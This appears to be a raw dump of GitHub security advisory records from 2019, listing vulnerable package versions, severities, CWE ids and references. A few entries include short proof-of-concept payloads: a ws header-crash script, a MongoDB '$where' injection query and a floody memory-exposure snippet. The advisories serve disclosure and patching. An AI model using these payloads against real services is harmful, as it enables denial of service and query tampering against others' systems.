[{'type': 'WEB', 'url': 'https://hackerone.com/reports/355456'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/805'}]
{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-05T13:49:00Z', 'nvd_published_at': None}
1.4.0
GHSA-wfp9-vr4j-f49j
2023-04-21T19:34:39Z
2019-06-04T20:04:27Z
null
[]
NoSQL Injection in sequelize
Versions of `sequelize` prior to 4.12.0 are vulnerable to NoSQL Injection. Query operators such as `$gt` are not properly sanitized and may allow an attacker to alter data queries, leading to NoSQL Injection. ## Recommendation Upgrade to version 4.12.0 or later
[]
[{'package': {'ecosystem': 'npm', 'name': 'sequelize'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.12.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/issues/7310'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/pull/8240'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/commit/ccb99daedb69e8750a241436415ccac8abef358d'}, {'type': 'PACKAGE', 'url': 'https://github.com/sequelize/sequelize'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SEQUELIZE-174147'}]
{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-04T20:04:00Z', 'nvd_published_at': None}
1.4.0
GHSA-jwgx-9mmh-684w
2022-02-11T21:13:16Z
2019-06-13T20:02:56Z
null
['CVE-2019-3888']
Credential exposure through log files in Undertow
A vulnerability was found in Undertow web server before 2.0.21. An information exposure of plain text credentials through log files because Connectors.executeRootHandler:402 logs the HttpServerExchange object at ERROR level using UndertowLogger.REQUEST_LOGGER.undertowRequestFailed(t, exchange)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'io.undertow:undertow-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.21'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-3888'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2019:2439'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2019:2998'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0727'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3888'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20220210-0019/'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/108739'}]
{'cwe_ids': ['CWE-532'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2019-06-13T20:02:23Z', 'nvd_published_at': '2019-06-12T14:29:00Z'}
1.4.0
GHSA-76wm-422q-92mq
2021-08-17T13:42:04Z
2019-06-20T16:06:11Z
null
['CVE-2019-8324']
Code injection in RubyGems
An issue was discovered in RubyGems 2.6 and later through 3.0.2. A crafted gem with a multi-line name is not handled correctly. Therefore, an attacker could inject arbitrary code to the stub line of gemspec, which is eval-ed by code in ensure_loadable_spec during the preinstall check.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'RubyGems', 'name': 'rubygems-update'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.7.9'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'rubygems-update'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-8324'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2019:1972'}, {'type': 'WEB', 'url': 'https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rubygems-update/CVE-2019-8324.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/08/msg00027.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html'}]
{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-20T16:01:22Z', 'nvd_published_at': None}
1.4.0
GHSA-8948-ffc6-jg52
2021-08-04T20:58:53Z
2019-06-06T15:32:21Z
null
[]
Insecure Default Configuration in redbird
Versions of `redbird` prior to 0.9.1 have a vulnerable default configuration of allowing TLS 1.0 connections on `lib/proxy.js`. The package does not provide an option to disable TLS 1.0 which is deprecated and vulnerable. ## Recommendation Upgrade to version 0.9.1 or later.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'redbird'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.9.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/OptimalBits/redbird/pull/207'}, {'type': 'WEB', 'url': 'https://github.com/OptimalBits/redbird/commit/39c7a2da84a2ddddfe046ea80e98800518920516'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-REDBIRD-174455'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/828'}]
{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-06T13:06:37Z', 'nvd_published_at': None}
1.4.0
GHSA-wxhq-pm8v-cw75
2020-08-31T18:35:40Z
2019-06-05T20:50:16Z
null
[]
Regular Expression Denial of Service in clean-css
Version of `clean-css` prior to 4.1.11 are vulnerable to Regular Expression Denial of Service (ReDoS). Untrusted input may cause catastrophic backtracking while matching regular expressions. This can cause the application to be unresponsive leading to Denial of Service. ## Recommendation Upgrade to version 4.1.11 or higher.
[]
[{'package': {'ecosystem': 'npm', 'name': 'clean-css'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.11'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/jakubpawlowicz/clean-css/commit/2929bafbf8cdf7dccb24e0949c70833764fa87e3'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/785'}]
{'cwe_ids': ['CWE-1333'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2019-06-05T20:49:47Z', 'nvd_published_at': None}
1.4.0
GHSA-57cf-349j-352g
2020-08-31T18:31:27Z
2019-06-12T16:37:00Z
null
[]
Out-of-bounds Read in npmconf
Versions of `npmconf` before 2.1.3 allocate and write to disk uninitialized memory contents when a typed number is passed as input on Node.js 4.x. ## Recommendation Update to version 2.1.3 or later. Consider switching to another config storage mechanism, as npmconf is deprecated and should not be used.
[]
[{'package': {'ecosystem': 'npm', 'name': 'npmconf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.3'}]}]}]
[{'type': 'WEB', 'url': 'https://hackerone.com/reports/320269'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/653'}]
{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-12T16:35:03Z', 'nvd_published_at': None}
1.4.0
GHSA-4vmm-mhcq-4x9j
2021-08-16T16:06:38Z
2019-06-14T16:15:14Z
null
[]
Sandbox Bypass Leading to Arbitrary Code Execution in constantinople
Versions of `constantinople` prior to 3.1.1 are vulnerable to a sandbox bypass which can lead to arbitrary code execution. ## Recommendation Update to version 3.1.1 or later.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'constantinople'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/pugjs/constantinople/commit/01d409c0d081dfd65223e6b7767c244156d35f7f'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1577703'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/npm:constantinople:20180421'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/568'}]
{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2019-06-14T16:14:40Z', 'nvd_published_at': None}
1.4.0
GHSA-5v72-xg48-5rpm
2021-08-04T21:29:05Z
2019-06-04T19:37:52Z
null
[]
Denial of Service in ws
Affected versions of `ws` can crash when a specially crafted `Sec-WebSocket-Extensions` header containing `Object.prototype` property names as extension or parameter names is sent. ## Proof of concept ``` const WebSocket = require('ws'); const net = require('net'); const wss = new WebSocket.Server({ port: 3000 }, function () { const payload = 'constructor'; // or ',;constructor' const request = [ 'GET / HTTP/1.1', 'Connection: Upgrade', 'Sec-WebSocket-Key: test', 'Sec-WebSocket-Version: 8', `Sec-WebSocket-Extensions: ${payload}`, 'Upgrade: websocket', '\r\n' ].join('\r\n'); const socket = net.connect(3000, function () { socket.resume(); socket.write(request); }); }); ``` ## Recommendation Update to version 3.3.1 or later.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'ws'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.6'}, {'fixed': '1.1.5'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'ws'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '3.3.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a'}, {'type': 'WEB', 'url': 'https://github.com/websockets/ws/commit/f8fdcd40ac8be7318a6ee41f5ceb7e77c995b407'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/npm:ws:20171108'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/550'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/550/versions'}]
{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-04T19:37:42Z', 'nvd_published_at': None}
1.4.0
GHSA-cxx2-fp39-rf3r
2021-08-04T19:53:10Z
2019-06-06T15:29:22Z
null
['CVE-2019-10076']
Cross-Site Scripting in JSPWiki
A carefully crafted malicious attachment could trigger an XSS vulnerability on Apache JSPWiki 2.9.0 to 2.11.0.M3, which could lead to session hijacking.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.jspwiki:jspwiki-war'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.11.0.M4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.11.0.M3'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.jspwiki:jspwiki-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.11.0.M4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.11.0.M3'}}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10076'}, {'type': 'WEB', 'url': 'https://jspwiki-wiki.apache.org/Wiki.jsp?page=CVE-2019-10076'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/aac253cfc33c0429b528e2fcbe82d3a42d742083c528f58d192dfd16@%3Ccommits.jspwiki.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2019/05/19/4'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/108437'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-05-29T19:05:23Z', 'nvd_published_at': None}
1.4.0
GHSA-g45g-g52h-39rg
2023-01-23T20:02:18Z
2019-06-07T20:56:42Z
null
['CVE-2019-12732']
Cross-site Scripting in Chartkick
The Chartkick gem through 3.1.0 for Ruby allows XSS.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'RubyGems', 'name': 'chartkick'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-12732'}, {'type': 'WEB', 'url': 'https://github.com/ankane/chartkick/issues/488'}, {'type': 'PACKAGE', 'url': 'https://github.com/ankane/chartkick'}, {'type': 'WEB', 'url': 'https://github.com/ankane/chartkick/blob/master/CHANGELOG.md'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-07T10:49:06Z', 'nvd_published_at': '2019-06-06T15:29:00Z'}
1.4.0
GHSA-hpfq-8wx8-cgqw
2020-08-31T18:41:56Z
2019-06-13T18:59:18Z
null
[]
Cross-Site Scripting in ids-enterprise
Versions of `ids-enterprise` prior to 4.18.2 are vulnerable to Cross-Site Scripting (XSS). The `modal` component fails to sanitize input to the `title` attribute, which may allow attackers to execute arbitrary JavaScript. ## Recommendation Upgrade to version 4.18.2 or later
[]
[{'package': {'ecosystem': 'npm', 'name': 'ids-enterprise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.18.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/infor-design/enterprise-ng/issues/511'}, {'type': 'WEB', 'url': 'https://github.com/infor-design/enterprise/commit/9b57aaa0321bf2e5baa6c4c5c1eb3b8312e215c4'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/957'}]
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-13T18:49:52Z', 'nvd_published_at': None}
1.4.0
GHSA-q4hg-rmq2-52q9
2021-04-12T18:23:31Z
2019-06-26T01:09:40Z
null
['CVE-2019-10072']
Improper Locking in Apache Tomcat
The fix for CVE-2019-0199 was incomplete and did not address HTTP/2 connection window exhaustion on write in Apache Tomcat versions 9.0.0.M1 to 9.0.19 and 8.5.0 to 8.5.40 . By not sending WINDOW_UPDATE messages for the connection window (stream 0) clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0.M1'}, {'fixed': '9.0.20'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.5.0'}, {'fixed': '8.5.40'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10072'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2019:3929'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2019:3931'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/df1a2c1b87c8a6c500ecdbbaf134c7f1491c8d79d98b48c6b9f0fa6a@%3Cannounce.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20190625-0002/'}, {'type': 'WEB', 'url': 'https://support.f5.com/csp/article/K17321505'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4128-1/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4128-2/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4680'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html'}, {'type': 'WEB', 'url': 'https://www.synology.com/security/advisory/Synology_SA_19_29'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00013.html'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/108874'}]
{'cwe_ids': ['CWE-667'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-26T00:56:45Z', 'nvd_published_at': '2019-06-21T18:15:00Z'}
1.4.0
GHSA-m734-r4g6-34f9
2021-08-04T20:47:58Z
2019-06-04T19:36:17Z
null
[]
NoSQL Injection in loopback-connector-mongodb
Versions of `loopback-connector-mongodb` before 3.6.0 are vulnerable to NoSQL injection. MongoDB Connector for LoopBack fails to properly sanitize a filter passed to query the database by allowing the dangerous `$where` property to be passed to the MongoDB Driver. The Driver allows the special `$where` property in a filter to execute JavaScript (client can pass in a malicious script) on the database Driver. This is an [intended feature of MongoDB](https://docs.mongodb.com/manual/core/server-side-javascript/) unless disabled ([instructions here](https://docs.mongodb.com/manual/core/server-side-javascript/#disable-server-side-js)). A proof of concept malicious query: ``` GET /POST filter={"where": {"$where": "function(){sleep(5000); return this.title.contains('Hello');}"}} ``` The above makes the database sleep for 5 seconds and then returns all “Posts” with the title containing the word `Hello`. ## Recommendation Update to version 3.6.0 or later.
[]
[{'package': {'ecosystem': 'npm', 'name': 'loopback-connector-mongodb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/strongloop/loopback-connector-mongodb/issues/403'}, {'type': 'WEB', 'url': 'https://github.com/strongloop/loopback-connector-mongodb/pull/452'}, {'type': 'WEB', 'url': 'https://github.com/strongloop/loopback-connector-mongodb/commit/ee24cd08b8ccc32711264831c71b1da628df357b'}, {'type': 'WEB', 'url': 'https://loopback.io/doc/en/lb3/Security-advisory-08-15-2018.html'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/696'}]
{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-04T19:35:47Z', 'nvd_published_at': None}
1.4.0
GHSA-2479-qvv7-47qq
2022-09-13T22:16:02Z
2019-06-13T16:22:13Z
null
['CVE-2019-1020012']
Parse Server before v3.4.1 vulnerable to Denial of Service
### Impact If a POST request is made to /parse/classes/_Audience (or other volatile class), any subsuquent POST requests result in an internal server error (500). ### Patches Afflicted installations will also have to remove the offending collection from their database. Yes, patched in 3.4.1 ### Workarounds Yes, user can apply: https://github.com/parse-community/parse-server/commit/8709daf698ea69b59268cb66f0f7cee75b52daa5 ### References Nothing other than this advisory at this time ### For more information If you have any questions or comments about this advisory: * Open an issue in [parse-server](https://github.com/parse-community/parse-server) * Email us at [security@parseplatform.org](mailto:security@parseplatform.org)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'parse-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/security/advisories/GHSA-2479-qvv7-47qq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1020012'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-2479-qvv7-47qq'}, {'type': 'PACKAGE', 'url': 'https://github.com/parse-community/parse-server'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PARSESERVER-455635'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1113'}]
{'cwe_ids': ['CWE-444'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-06-16T20:51:19Z', 'nvd_published_at': None}
1.4.0
GHSA-r6v3-hpxj-r8rv
2021-07-27T20:55:27Z
2019-06-07T20:56:27Z
null
['CVE-2019-12761']
Code Injection in PyXDG
A code injection issue was discovered in PyXDG before 0.26 via crafted Python code in a Category element of a Menu XML document in a .menu file. XDG_CONFIG_DIRS must be set up to trigger xdg.Menu.parse parsing within the directory containing this file. This is due to a lack of sanitization in xdg/Menu.py before an eval call.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'pyxdg'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.26'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-12761'}, {'type': 'WEB', 'url': 'https://gist.github.com/dhondta/b45cd41f4186110a354dc7272916feba'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2019/06/msg00006.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/08/msg00003.html'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-PYXDG-174562'}]
{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-07T10:24:55Z', 'nvd_published_at': '2019-06-06T19:29:00Z'}
1.4.0
GHSA-3p92-886g-qxpq
2021-08-04T21:27:04Z
2019-06-04T15:42:32Z
null
[]
Remote Memory Exposure in floody
Versions of `floody` before 0.1.1 are vulnerable to remote memory exposure. .write(number)` in the affected `floody` versions passes a number to Buffer constructor, appending a chunk of uninitialized memory. Proof of Concept: ``` var f = require('floody')(process.stdout); f.write(USERSUPPLIEDINPUT); 'f.stop(); ## Recommendation Update to version 0.1.1 or later.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'floody'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/soldair/node-floody/commit/6c44722312131f4ac8a1af40f0f861c85efe01b0'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/npm:floody:20160115'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/601'}]
{'cwe_ids': ['CWE-201'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-04T15:40:44Z', 'nvd_published_at': None}
1.4.0
GHSA-hxcm-v35h-mg2x
2021-02-25T17:25:43Z
2019-06-07T21:12:50Z
null
[]
Prototype Pollution
A vulnerability was found in querystringify before 2.0.0. It's possible to override built-in properties of the resulting query string object if a malicious string is inserted in the query string.
[]
[{'package': {'ecosystem': 'npm', 'name': 'querystringify'}, 'ecosystem_specific': {'affected_functions': ['querystringify.parse']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/unshiftio/querystringify/pull/19'}, {'type': 'WEB', 'url': 'https://github.com/unshiftio/querystringify/commit/422eb4f6c7c28ee5f100dcc64177d3b68bb2b080'}]
{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-07T21:11:35Z', 'nvd_published_at': None}
1.4.0
GHSA-49r3-3h96-rwj6
2020-08-31T18:41:54Z
2019-06-13T19:09:31Z
null
[]
Cross-Site Scripting in ids-enterprise
Versions of `ids-enterprise` prior to 4.18.2 are vulnerable to Cross-Site Scripting (XSS). The `soho-dropdown` component does not properly encode its output and may allow attackers to execute arbitrary JavaScript. ## Recommendation Upgrade to version 4.18.2 or later
[]
[{'package': {'ecosystem': 'npm', 'name': 'ids-enterprise'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.18.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/infor-design/enterprise-ng/issues/503'}, {'type': 'WEB', 'url': 'https://github.com/infor-design/enterprise/commit/6bd74d8f38c268b22f31e8169316e065e0093362'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/956'}]
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-13T19:09:01Z', 'nvd_published_at': None}
1.4.0
GHSA-fr32-gr5c-xq5c
2023-08-28T13:19:04Z
2019-06-20T16:06:04Z
null
['CVE-2019-8321']
RubyGems Escape sequence injection vulnerability in verbose
An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since Gem::UserInteraction#verbose calls say without escaping, escape sequence injection is possible.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'RubyGems', 'name': 'rubygems-update'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.7.9'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'rubygems-update'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-8321'}, {'type': 'WEB', 'url': 'https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rubygems-update/CVE-2019-8321.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/08/msg00027.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html'}]
{'cwe_ids': ['CWE-88'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-20T16:00:39Z', 'nvd_published_at': None}
1.4.0
GHSA-vc6r-4x6g-mmqc
2020-08-31T18:33:45Z
2019-06-11T16:16:23Z
null
[]
Path Traversal in m-server
Versions of `m-server` before 1.4.2 are vulnerable to path traversal allowing a remote attacker to display content of arbitrary files from the server. ## Recommendation Update to version 1.4.2 or later.
[]
[{'package': {'ecosystem': 'npm', 'name': 'm-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/nunnly/m-server/commit/01f13f040d1961ca3146dce7e2db990156e65e9a'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/319795'}, {'type': 'WEB', 'url': 'https://github.com/nodejs/security-wg/blob/master/vuln/npm/468.json'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/731'}]
{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-11T16:09:28Z', 'nvd_published_at': None}
1.4.0
GHSA-g74r-ffvr-5q9f
2020-08-31T18:29:17Z
2019-06-03T17:26:44Z
null
[]
Memory Exposure in concat-stream
Versions of `concat-stream` before 1.5.2 are vulnerable to memory exposure if userp provided input is passed into `write()` Versions <1.3.0 are not affected due to not using unguarded Buffer constructor. ## Recommendation Update to version 1.5.2, 1.4.11, 1.3.2 or later. If you are unable to update make sure user provided input into the `write()` function is not a number.
[]
[{'package': {'ecosystem': 'npm', 'name': 'concat-stream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'concat-stream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.4.11'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'concat-stream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3.0'}, {'fixed': '1.3.2'}]}]}]
